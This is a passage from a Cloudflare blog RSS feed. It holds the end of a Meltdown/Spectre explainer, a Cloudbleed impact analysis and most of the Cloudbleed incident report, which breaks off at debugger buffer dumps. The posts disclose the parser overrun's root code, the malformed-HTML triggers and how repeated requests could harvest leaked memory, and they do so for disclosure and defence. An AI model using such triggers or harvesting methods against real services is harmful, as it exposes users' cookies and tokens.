            </figure><p>You’d actually heard rumours of Men In Black and want to find some way of letting yourself know whether you saw aliens or not. Since there’s a short space between you seeing aliens and your memory being erased you come up with a plan.</p><p>If you see aliens then you gulp down an energy drink that you have in your backpack. Once deposited back at the fork by the Men In Black you can discover whether you drank the energy drink (and therefore whether you saw aliens) by walking 500 metres and timing yourself. You’ll go faster with the extra carbs in a can of <i>Reactor Core</i>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MbVsqQ9L4VhxLzTLHCp8U/b1dac5511e6b12e889872f5d59dc8946/stopwatch_0.5x.png" />
            
            </figure><p>Computers have also reached high speeds by keeping a copy of frequently or recently accessed information inside the CPU itself. The closer data is to the CPU the faster it can be used.</p><p>This store of recently/frequently used data inside the CPU is called a “cache”. Both branch prediction and the cache mean that CPUs are blazingly fast. Sadly, they can also be combined to create the security problems that have recently been reported with Intel and other CPUs.</p><p>In the Meltdown/Spectre attacks, the attacker determines what secret information (the real world equivalent of the aliens) was accessed using timing information (but not an energy drink!). In the split second after accessing illegal memory, and before the code being run is forgotten by the CPU, the attacker’s code loads a single byte into the CPU cache. A single byte which it has perfectly legal access to; something from its own program memory!</p><p>The attacker can then determine what happened in the branch just by trying to read the same byte: if it takes a long time to read then it wasn’t in cache, if it doesn’t take long then it was. The difference in timing is all the attacker needs to know what occurred in the branch the CPU should never have executed.</p><p>To turn this into an exploit that actually reads illegal memory is easy. Just repeat this process over and over again once per single bit of illegal memory that you are reading. Each single bit’s 1 or 0 can be translated into the presence or absence of an item in the CPU cache which is ‘read’ using the timing trick above.</p><p>Although that might seem like a laborious process, it is, in fact, something that can be done very quickly enabling the dumping of the entire memory of a computer. In the real world it would be impractical to hike down the path and get zapped by the Men In Black in order to leak details of the aliens (their color, size, language, etc.), but in a computer it’s feasible to redo the branch over and over again because of the inherent speed (100s of millions of branches per second!).</p><p>And if an attacker can dump the memory of a computer it has access to the crown jewels: what’s in memory at any moment is likely to be very, very sensitive: passwords, cryptographic secrets, the email you are writing, a private chat and more.</p>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>I hope that this helps you understand the essence of Meltdown and Spectre. There are many variations of both attacks that all rely on the same ideas: get the CPU to speculatively run some code (through branch prediction or another technique) that illegally accesses memory and extract information using a timing side channel through the CPU cache.</p><p>If you care to read all the gory detail there’s a <a href="https://meltdownattack.com/meltdown.pdf">paper on Meltdown</a> and a separate one <a href="https://spectreattack.com/spectre.pdf">on Spectre</a>.</p><p>Acknowledgements: I’m grateful to all the people who read this and gave me feedback (including gently telling me the ways in which I didn’t understand branch prediction and speculative execution). Thank you especially to David Wragg, Kenton Varda, Chris Branch, Vlad Krasnov, Matthew Prince, Michelle Zatlyn and Ben Cartwright-Cox. And huge thanks for Kari Linder for the illustrations.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">20Go8XADyAd2Ha0gxcfMMB</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[Quantifying the Impact of "Cloudbleed"]]></title>
            <link>https://blog.cloudflare.com/quantifying-the-impact-of-cloudbleed/</link>
            <pubDate>Wed, 01 Mar 2017 15:27:00 GMT</pubDate>
            <description><![CDATA[ Last Thursday we released details on a bug in Cloudflare's parser impacting our customers. It was an extremely serious bug that caused data flowing through Cloudflare's network to be leaked onto the Internet. ]]></description>
            <content:encoded><![CDATA[ <p>Last Thursday we <a href="/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/">released details</a> on a bug in Cloudflare's parser impacting our customers. It was an extremely serious bug that caused data flowing through Cloudflare's network to be leaked onto the Internet. We fully patched the bug within hours of being notified. However, given the scale of Cloudflare, the impact was potentially massive.</p><p>The bug has been dubbed “Cloudbleed.” Because of its potential impact, the bug has been written about extensively and generated a lot of uncertainty. The burden of that uncertainty has been felt by our partners, customers, and our customers’ customers. The question we’ve been asked the most often is: what risk does Cloudbleed pose to me?</p><p>We've spent the last twelve days using log data on the actual requests we’ve seen across our network to get a better grip on what the impact was and, in turn, provide an estimate of the risk to our customers. This post outlines our initial findings.</p><p>The summary is that, while the bug was very bad and had the potential to be much worse, based on our analysis so far: 1) we have found no evidence based on our logs that the bug was maliciously exploited before it was patched; 2) the vast majority of Cloudflare customers had no data leaked; 3) after a review of tens of thousands of pages of leaked data from search engine caches, we have found a large number of instances of leaked internal Cloudflare headers and customer cookies, but we have not found any instances of passwords, credit card numbers, or health records; and 4) our review is ongoing.</p><p>To make sense of the analysis, it's important to understand exactly how the bug was triggered and when data was exposed. If you feel like you've already got a good handle on how the bug got triggered, <a href="#skip">click here</a> to skip to the analysis.</p>
    <div>
      <h2>Triggering the Bug</h2>
      <a href="#triggering-the-bug">
        
      </a>
    </div>
    <p>One of Cloudflare's core applications is a stream parser. The parser scans content as it is delivered from Cloudflare's network and is able to modify it in real time. The parser is used to enable functions like automatically rewriting links from HTTP to HTTPS (Automatic HTTPS Rewrites), hiding email addresses on pages from email harvesters (Email Address Obfuscation), and other similar features.</p><p>The Cloudbleed bug was triggered when a page with two characteristics was requested through Cloudflare's network. The two characteristics were: 1) the HTML on the page needed to be broken in a specific way; and 2) a particular set of Cloudflare features needed to be turned on for the page in question.</p><p>The specific HTML flaw was that the page had to end with an unterminated attribute. In other words, something like:</p>
            <pre><code>&lt;IMG HEIGHT="50px" WIDTH="200px" SRC="</code></pre>
            <p>Here's why that mattered. When a page for a particular customer is being parsed it is stored in memory on one of the servers that is a part of our infrastructure. Contents of the other customers' requests are also in adjacent portions of memory on Cloudflare's servers.</p><p>The bug caused the parser, when it encountered unterminated attribute at the end of a page, to not stop when it reached the end of the portion of memory for the particular page being parsed. Instead, the parser continued to read from adjacent memory, which contained data from other customers' requests. The contents of that adjacent memory was then dumped onto the page with the flawed HTML.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1yvI4wl7lorT0A9EMcML1J/d568d31dd873504853c484f1aacf269e/example-leak.png" />
            
            </figure><p>The screenshot above is an example of how data was dumped on pages. Most of the data was random binary data which the browser is trying to interpret as largely Asian characters. That is followed by a number of internal Cloudflare headers.</p><p>If you had accessed one of the pages that triggered the bug you would have seen what likely looked like random text at the end of the page. The amount of data dumped was of random lengths limited to the size of the heap or when the parser happened across a character that caused the output to terminate.</p>
    <div>
      <h2>Code Path and a New Parser</h2>
      <a href="#code-path-and-a-new-parser">
        
      </a>
    </div>
    <p>In addition to a page with flawed HTML, the particular set of Cloudflare features that were enabled mattered because it determined the version of the parser that was used. We rolled out a new version of the parser code on 22 September 2016. This new version of the parser exposed the bug.</p><p>Initially, the new parser code would only get executed under a very limited set of circumstances. Fewer than 180 sites from 22 September 2016 through 13 February 2017 had the combination of the HTML flaw and the set of features that would trigger the new version of the parser. During that time period, pages that had both characteristics and therefore would trigger the bug were accessed an estimated 605,037 times.</p><p>On 13 February 2017, not aware of the bug, we expanded the circumstances under which the new parser would get executed. That expanded the number of sites where the bug could get triggered from fewer than 180 to 6,457. From 13 February 2017 through 18 February 2017, when we patched the bug, the pages that would trigger the bug were accessed an estimated 637,034 times. In total, between 22 September 2016 and 18 February 2017 we now estimate based on our logs the bug was triggered 1,242,071 times.</p><p>The pages that typically triggered the bug tended to be on small and infrequently accessed sites. When one of these vulnerable pages was accessed and the bug was triggered, it was random what other customers would have content in memory adjacent that would then get leaked. Higher traffic Cloudflare customers would be more probable to have some data in memory because they received more requests and so, probabilistically, they're more likely to have their content in memory at any given time.</p><p>To be clear, customers that had data leak did not need to have flawed HTML or any particular Cloudflare features enabled. They just needed to be unlucky and have their data in memory immediately following a page that triggered the bug.</p>
    <div>
      <h2>How a Malicious Actor Would Exploit the Bug</h2>
      <a href="#how-a-malicious-actor-would-exploit-the-bug">
        
      </a>
    </div>
    <p>The Cloudbleed bug wasn't like a typical data breach. To analogize to the physical world, a typical data breach would be like a robber breaking into your office and stealing all your file cabinets. The bad news in that case is that the robber has all your files. The good news is you know exactly what they have.</p><p>Cloudbleed is different. It's more akin to learning that a stranger may have listened in on two employees at your company talking over lunch. The good news is the amount of information for any conversation that's eavesdropped is limited. The bad news is you can't know exactly what the stranger may have heard, including potentially sensitive information about your company.</p><p>If a stranger were listening in on a conversation between two employees, the vast majority of what they would hear wouldn't be harmful. But, every once in awhile, the stranger may overhear something confidential. The same is true if a malicious attacker knew about the bug and were trying to exploit it. Given that the data that leaked was random on a per request basis, most requests would return nothing interesting. But, every once in awhile, the data that leaked may return something of interest to a hacker.</p><p>If a hacker were aware of the bug before it was patched and trying to exploit it then the best way for them to do so would be to send as many requests as possible to a page that contained the set of conditions that would trigger the bug. They could then record the results. Most of what they would get would be useless, but some would contain very sensitive information.</p><p>The nightmare scenario we have been worried about is if a hacker had been aware of the bug and had been quietly mining data before we were notified by Google's Project Zero team and were able to patch it. For the last twelve days we've been reviewing our logs to see if there's any evidence to indicate that a hacker was exploiting the bug before it was patched. We’ve found nothing so far to indicate that was the case.</p>
    <div>
      <h2>Identifying Patterns of Malicious Behavior</h2>
      <a href="#identifying-patterns-of-malicious-behavior">
        
      </a>
    </div>
    <p>For a limited period of time we keep a debugging log of requests that pass through Cloudflare. This is done by sampling 1% of requests and storing information about the request and response. We are then able to look back in time for anomalies in HTTP response codes, response or request body sizes, response times, or other unusual behavior from specific networks or IP addresses.</p><p>We have the logs of 1% of all requests going through Cloudflare from 8 February 2017 up to 18 February 2017 (when the vulnerability was patched) giving us the ability to look for requests leaking data during this time period. Requests prior to 8 February 2017 had already been deleted. Because we have a representative sample of the logs for the 6,457 vulnerable sites, we were able to parse them in order to look for any evidence someone was exploiting the bug.</p><p>The first thing we looked for was a site we knew was vulnerable and for which we had accurate data. In the early hours of 18 February 2017, immediately after the problem was reported to us, we set up a vulnerable page on a test site and used it to reproduce the bug and then verify it had been fixed.</p><p>Because we had logging on the test web server itself we were able to quickly verify that we had the right data. The test web server had received 31,874 hits on the vulnerable page due to our testing. We had captured very close to 1% of those requests (316 were stored). From the sampled data, we were also able to look at the sizes of responses which showed a clear bimodal distribution. Small responses were from when the bug was fixed, large responses from when the leak was apparent.</p><p>This gave us confidence that we had captured the right information to go hunting for exploitation of the vulnerability.</p><p>We wanted to answer two questions:</p><ol><li><p>Did any individual IP hit a vulnerable page enough times that a meaningful amount of data was extracted? This would capture the situation where someone had discovered the problem on a web page and had set up a process to repeatedly download the page from their machine. For example, something as simple as running <code>curl</code> in a loop would show up in this analysis.</p></li><li><p>Was any vulnerable page accessed enough times that a meaningful amount of data could have been extracted by a botnet? A more advanced hacker would have wanted to cover their footprints by using a wide range of IP addresses rather than repeatedly visiting a page from a single IP. To identify that possibility we wanted to see if any individual page had been accessed enough times and returned enough data for us to suspect that data was being extracted.</p></li></ol>
    <div>
      <h2>Reviewing the Logs</h2>
      <a href="#reviewing-the-logs">
        
      </a>
    </div>
    <p>To answer #1, we looked for any IP addresses that had hit a single page on a vulnerable site more than 1,000 times and downloaded more data than the site would normally deliver. We found 7 IP addresses with those characteristics.</p><p>Six of the seven IP addresses were accessing three sites with three pages with very large HTML. Manual inspection showed that these pages did not contain the broken HTML that would have triggered the bug. They also did not appear in a database of potentially vulnerable pages that our team gathered after the bug was patched.</p><p>The other IP address belonged to a mobile network and was traffic for a ticket booking application. The particular page was very large even though it was not leaking data, however, it did not contain broken HTML, and was not in our database of vulnerable pages.</p><p>To look for evidence of #2, we retrieved every page on a vulnerable site that was requested more than 1,000 times during the period. We then downloaded those pages and ran them through the vulnerable version of our software in a test environment to see if any of them would cause a leak. This search turned up the sites we had created to test the vulnerability. However, we found no vulnerable pages, outside of our own test sites, that had been accessed more than 1,000 times.</p><p>This leads us to believe that the vulnerability had not been exploited between 8 February 2017 and 18 February 2017. However, we also wanted to look for signs of exploitation between 22 September 2016 and 8 February 2017 — a time period for which we did not have sampled log data. To do that, we turned to our customer analytics database.</p>
    <div>
      <h2>Reviewing Customer Analytics</h2>
      <a href="#reviewing-customer-analytics">
        
      </a>
    </div>
    <p>We store customer analytics data with one hour granularity in a large datastore. For every site on Cloudflare and for each hour we have the total number of requests to the site, number of bytes read from the origin web server, number of bytes sent to client web browsers, and the number of unique IP addresses accessing the site.</p><p>If a malicious attacker were sending a large number of requests to exploit the bug then we hypothesized that a number of signals would potentially appear in our logs. These include:</p><ul><li><p>The ratio of requests per unique IP would increase. While an attacker could use a botnet or large number of machines to harvest data, we speculated that, at least initially, upon discovering the bug the hacker would send a large number of requests from a small set of IPs to gather initial data.</p></li></ul><p>* The ratio of bandwidth per request would increase. Since the bug leaks a large amount of data onto the page, if the bug were being exploited then the bandwidth per request would increase.</p><p>* The ratio of bandwidth per unique IP would also increase. Since you’d expect that more data was going to the smaller set of IPs the attacker would use to pull down data then the bandwidth per IP would increase.</p><p>We used the data from before the bug impacted sites to set the baseline for each site for each of these three ratios. We then tracked the ratios above across each site individually during the period for which it was vulnerable and looked for anomalies that may suggest a hacker was exploiting the vulnerability ahead of its public disclosure.</p><p>This data is much more noisy than the sampled log data because it is rolled up and averaged over one hour windows. However, we have not seen any evidence of exploitation of this bug from this data.</p>
    <div>
      <h2>Reviewing Crash Data</h2>
      <a href="#reviewing-crash-data">
        
      </a>
    </div>
    <p>Lastly, when the bug was triggered it would, depending on what was read from memory, sometimes cause our parser application to crash. We have technical operations logs that record every time an application running on our network crashes. These logs cover the entire period of time the bug was in production (22 September 2016 – 18 February 2017).</p><p>We ran a suite of known-vulnerable HTML through our test platform to establish the percentage of time that we would expect the application to crash.</p><p>We reviewed our application crash logs for the entire period the bug was in production. We did turn up periodic instances of the parser crashing that align with the frequency of how often we estimate the bug was triggered. However, we did not see a signal in the crash data that would indicate that the bug was being actively exploited at any point during the period it was present in our system.</p>
    <div>
      <h2>Purging Search Engine Caches</h2>
      <a href="#purging-search-engine-caches">
        
      </a>
    </div>
    <p>Even if an attacker wasn’t actively exploiting the bug prior to our patching it, there was still potential harm because private data leaked and was cached by various automated crawlers. Because the 6,457 sites that could trigger the bug were generally small, the largest percentage of their traffic comes from search engine crawlers. Of the 1,242,071 requests that triggered the bug, we estimate more than half came from search engine crawlers.</p><p>Cloudflare has spent the last 12 days working with various search engines — including Google, Bing, Yahoo, Baidu, Yandex, DuckDuckGo, and others — to clear their caches. We were able to remove the majority of the cached pages before the disclosure of the bug last Thursday.</p><p>Since then, we’ve worked with major search engines as well as other online archives to purge cached data. We’ve successfully removed more than 80,000 unique cached pages. That underestimates the total number because we’ve requested search engines purge and recrawl entire sites in some instances. Cloudflare customers who discover leaked data still online can report it by sending a link to the cache to <a href="#">parserbug@cloudflare.com</a> and our team will work to have it purged.</p>
    <div>
      <h2>Analysis of What Data Leaked</h2>
      <a href="#analysis-of-what-data-leaked">
        
      </a>
    </div>
    <p>The search engine caches provide us an opportunity to analyze what data leaked. While many have speculated that any data passing through Cloudflare may have been exposed, the way that data is structured in memory and the frequency of GET versus POST requests makes certain data more or less likely to be exposed. We analyzed a representative sample of the cached pages retrieved from search engine caches and ran a thorough analysis on each of them. The sample included thousands of pages and was statistically significant to a confidence level of 99% with a margin of error of 2.5%. Within that sample we would expect the following data types to appear this many times in any given leak:</p>
            <pre><code>  67.54 Internal Cloudflare Headers
   0.44 Cookies
   0.04 Authorization Headers / Tokens
      0 Passwords
      0 Credit Cards / Bitcoin Addresses
      0 Health Records
      0 Social Security Numbers
      0 Customer Encryption Keys</code></pre>
            <p>The above can be read to mean that in any given leak you would expect to find 67.54 Cloudflare internal headers. You’d expect to find a cookie in approximately half of all leaks (0.44 cookies per leak). We did not find any passwords, credit cards, health records, social security numbers, or customer encryption keys in the sample set.</p><p>Since this is just a sample, it is <i>not correct</i> to conclude that no passwords, credit cards, health records, social security numbers, or customer encryption keys were ever exposed. However, if there was any exposure, based on the data we’ve reviewed, it does not appear to have been widespread. We have also not had any confirmed reports of third parties discovering any of these sensitive data types on any cached pages.</p><p>These findings generally make sense given what we know about traffic to Cloudflare sites. Based on our logs, the ratio of GET to POST requests across our network is approximately 100-to-1. Since POSTs are more likely to contain sensitive data like passwords, we estimate that reduces the potential exposure of the most sensitive data from 1,242,071 requests to closer to 12,420. POSTs that contain particularly sensitive information would then represent only a fraction of the 12,420 we would expect to have leaked.</p><p>This is not to downplay the seriousness of the bug. For instance, depending on how a Cloudflare customer’s systems are implemented, cookie data, which would be present in GET requests, could be used to impersonate another user’s session. We’ve seen approximately 150 Cloudflare customers’ data in the more than 80,000 cached pages we’ve purged from search engine caches. When data for a customer is present, we’ve reached out to the customer proactively to share the data that we’ve discovered and help them work to mitigate any impact. Generally, if customer data was exposed, invalidating session cookies and rolling any internal authorization tokens is the best advice to mitigate the largest potential risk based on our investigation so far.</p>
    <div>
      <h2>How to Understand Your Risk</h2>
      <a href="#how-to-understand-your-risk">
        
      </a>
    </div>
    <p>We have tried to quantify the risk to individual customers that their data may have leaked. Generally, the more requests that a customer sent to Cloudflare, the more likely it is that their data would have been in memory and therefore exposed. This is anecdotally confirmed by the 150 customers whose data we’ve found in third party caches. The customers whose data appeared in caches are typically the customers that send the most requests through Cloudflare’s network.</p><p>Probabilistically, we are able to estimate the likelihood of data leaking for a particular customer based on the number of requests per month (RPM) that they send through our network since the more requests sent through our network the more likely a customer’s data is to be in memory when the bug was triggered. Below is a chart of the number of total anticipated data leak events from 22 September 2016 – 18 February 2017 that we would expect based on the average number of requests per month a customer sends through Cloudflare’s network:</p>
            <pre><code> Requests per Month       Anticipated Leaks
 ------------------       -----------------
        200B – 300B         22,356 – 33,534
        100B – 200B         11,427 – 22,356
         50B – 100B          5,962 – 11,427
          10B – 50B           1,118 – 5,926
           1B – 10B             112 – 1,118
          500M – 1B                56 – 112
        250M – 500M                 25 – 56
        100M – 250M                 11 – 25
         50M – 100M                  6 – 11
          10M – 50M                   1 – 6
              &lt; 10M                     &lt; 1</code></pre>
            <p>More than 99% of Cloudflare’s customers send fewer than 10 million requests per month. At that level, probabilistically we would expect that they would have no data leaked during the period the bug was present. For further context, the 100th largest website in the world is estimated to handle fewer than 10 billion requests per month, so there are very few of Cloudflare’s 6 million customers that fall into the top bands of the chart above. Cloudflare customers can find their own RPM by logging into the Cloudflare Analytics Dashboard and looking at the number of requests per month for their sites.</p><p>The statistics above assume that each leak contained only one customer’s data. That was true for nearly all of the leaks we reviewed from search engine caches. However, there were instances where more data may have been leaked. The probability table above should be considered just an estimate to help provide some general guidance on the likelihood a customer’s data would have leaked.</p>
    <div>
      <h2>Interim Conclusion</h2>
      <a href="#interim-conclusion">
        
      </a>
    </div>
    <p>We are continuing to work with third party caches to expunge leaked data and will not let up until every bit has been removed. We also continue to analyze Cloudflare’s logs and the particular requests that triggered the bug for anomalies. While we were able to mitigate this bug within minutes of it being reported to us, we want to ensure that other bugs are not present in the code. We have undertaken a full review of the parser code to look for any additional potential vulnerabilities. In addition to our own review, we're working with the outside code auditing firm <a href="https://www.veracode.com/">Veracode</a> to review our code.</p><p>Cloudflare’s mission is to help build a better Internet. Everyone on our team comes to work every day to help our customers — regardless of whether they are businesses, non-profits, governments, or hobbyists — run their corner of the Internet a little better. This bug exposed just how much of the Internet puts its trust in us. We know we disappointed you and we apologize. We will continue to share what we discover because we believe trust is critical and transparency is the foundation of that trust.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4vtfDGhBbFcAQmmbibppaQ</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Incident report on memory leak caused by Cloudflare parser bug]]></title>
            <link>https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/</link>
            <pubDate>Thu, 23 Feb 2017 23:01:06 GMT</pubDate>
            <description><![CDATA[ Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>Last Friday, <a href="https://twitter.com/taviso">Tavis Ormandy</a> from Google’s <a href="https://googleprojectzero.blogspot.co.uk/">Project Zero</a> <a href="https://twitter.com/taviso/status/832744397800214528">contacted</a> Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare.</p><p>It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines.</p><p>For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug.</p><p>We quickly identified the problem and turned off three minor Cloudflare features (<a href="https://support.cloudflare.com/hc/en-us/articles/200170016-What-is-Email-Address-Obfuscation-">email obfuscation</a>, <a href="https://support.cloudflare.com/hc/en-us/articles/200170036-What-does-Server-Side-Excludes-SSE-do-">Server-side Excludes</a> and <a href="https://support.cloudflare.com/hc/en-us/articles/227227647-How-do-I-use-Automatic-HTTPS-Rewrites-">Automatic HTTPS Rewrites</a>) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response.</p><p>Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses.</p><p>Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes.</p><p>The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence.</p><p>The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests).</p><p>We are grateful that it was found by one of the world’s top security research teams and reported to us.</p><p>This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service.</p>
    <div>
      <h2>Parsing and modifying HTML on the fly</h2>
      <a href="#parsing-and-modifying-html-on-the-fly">
        
      </a>
    </div>
    <p>Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can <a href="https://www.cloudflare.com/apps/google-analytics/">insert</a> the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable <a href="/accelerated-mobile/">AMP</a>, and more by modifying the HTML of a page.</p><p>To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using <a href="https://www.colm.net/open-source/ragel/">Ragel</a>. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs.</p><p>About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain.</p><p>We first used this new parser for the <a href="/how-we-brought-https-everywhere-to-the-cloud-part-1/">Automatic HTTP Rewrites</a> feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html.</p><p>Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter.</p><p>For the avoidance of doubt: the bug is <i>not</i> in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel.</p><p>It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself.</p><p>Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding <a href="https://en.wikipedia.org/wiki/Feature_toggle">feature flag</a>, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks.</p><p>Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing.</p><p>We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses.</p>
    <div>
      <h2>Root cause of the bug</h2>
      <a href="#root-cause-of-the-bug">
        
      </a>
    </div>
    <p>The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error.</p>
            <pre><code>/* generated code */
if ( ++p == pe )
    goto _test_eof;</code></pre>
            <p>The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using &gt;= instead of == jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly.</p><p>The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun.</p><p>Here’s a piece of Ragel code used to consume an attribute in an HTML <code>&lt;script&gt;</code> tag. The first line says that it should attempt to find zero or more <code>unquoted_attr_char</code> followed by (that’s the :&gt;&gt; concatenation operator) whitespace, forward slash or then &gt; signifying the end of the tag.</p>
            <pre><code>script_consume_attr := ((unquoted_attr_char)* :&gt;&gt; (space|'/'|'&gt;'))
&gt;{ ddctx("script consume_attr"); }
@{ fhold; fgoto script_tag_parse; }
$lerr{ dd("script consume_attr failed");
       fgoto script_consume_attr; };</code></pre>
            <p>If an attribute is well-formed, then the Ragel parser moves to the code inside the <code>@{ }</code> block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the <code>$lerr{ }</code> block is used.</p><p>For example, in certain circumstances (detailed below) if the web page <i>ended</i> with a broken HTML tag like this:</p>
            <pre><code>&lt;script type=</code></pre>
            <p>the <code>$lerr{ }</code> block would get used and the buffer would be overrun. In this case the <code>$lerr</code> does <code>dd(“script consume_attr failed”);</code> (that’s a debug logging statement that is a nop in production) and then does <code>fgoto script_consume_attr;</code> (the state transitions to <code>script_consume_attr</code> to parse the next attribute).From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites.</p><p>If you have a keen eye you may have noticed that the <code>@{ }</code> transition also did a <code>fgoto</code> but right before it did <code>fhold</code> and the <code>$lerr{ }</code> block did not. It’s the missing <code>fhold</code> that resulted in the memory leakage.</p><p>Internally, the generated C code has a pointer named <code>p</code> that is pointing to the character being examined in the HTML document. <code>fhold</code> is equivalent to <code>p--</code> and is essential because when the error condition occurs <code>p</code> will be pointing to the character that caused the <code>script_consume_attr</code> to fail.</p><p>And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then <code>p</code> will be after the end of the document (<code>p</code> will be <code>pe + 1</code> internally) and a subsequent check that the end of the buffer has been reached will fail and <code>p</code> will run outside the buffer.</p><p>Adding an <code>fhold</code> to the error handler fixes the problem.</p>
    <div>
      <h2>Why now</h2>
      <a href="#why-now">
        
      </a>
    </div>
    <p>That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years.</p><p>Returning to the <code>script_consume_attr</code> definition above:</p>
            <pre><code>script_consume_attr := ((unquoted_attr_char)* :&gt;&gt; (space|'/'|'&gt;'))
&gt;{ ddctx("script consume_attr"); }
@{ fhold; fgoto script_tag_parse; }
$lerr{ dd("script consume_attr failed");
       fgoto script_consume_attr; };</code></pre>
            <p>What happens when the parser runs out of characters to parse while consuming an attribute differs whether the buffer currently being parsed is the last buffer or not. If it’s not the last buffer, then there’s no need to use <code>$lerr</code> as the parser doesn’t know whether an error has occurred or not as the rest of the attribute may be in the next buffer.</p><p>But if this is the last buffer, then the <code>$lerr</code> is executed. Here’s how the code ends up skipping over the end-of-file and running through memory.</p><p>The entry point to the parsing function is <code>ngx_http_email_parse_email</code> (the name is historical, it does much more than email parsing).</p>
            <pre><code>ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) {
    u_char  *p = ctx-&gt;pos;
    u_char  *pe = ctx-&gt;buf-&gt;last;
    u_char  *eof = ctx-&gt;buf-&gt;last_buf ? pe : NULL;</code></pre>
            <p>You can see that <code>p</code> points to the first character in the buffer, <code>pe</code> to the character after the end of the buffer and <code>eof</code> is set to <code>pe</code> if this is the last buffer in the chain (indicated by the <code>last_buf</code> boolean), otherwise it is NULL.</p><p>When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above:</p>
            <pre><code>(gdb) p *in-&gt;buf
$8 = {
  pos = 0x558a2f58be30 "&lt;script type=\"",
  last = 0x558a2f58be3e "",

  [...]

  last_buf = 1,

  [...]
}</code></pre>
            <p>Here there is data and <code>last_buf</code> is 1. When the new parser is not present the final buffer that <i>contains data</i> looks like this:</p>
            <pre><code>(gdb) p *in-&gt;buf
$6 = {
  pos = 0x558a238e94f7 "&lt;script type=\"",
  last = 0x558a238e9504 "",

  [...]

  last_buf = 0,

  [...]
}</code></pre>
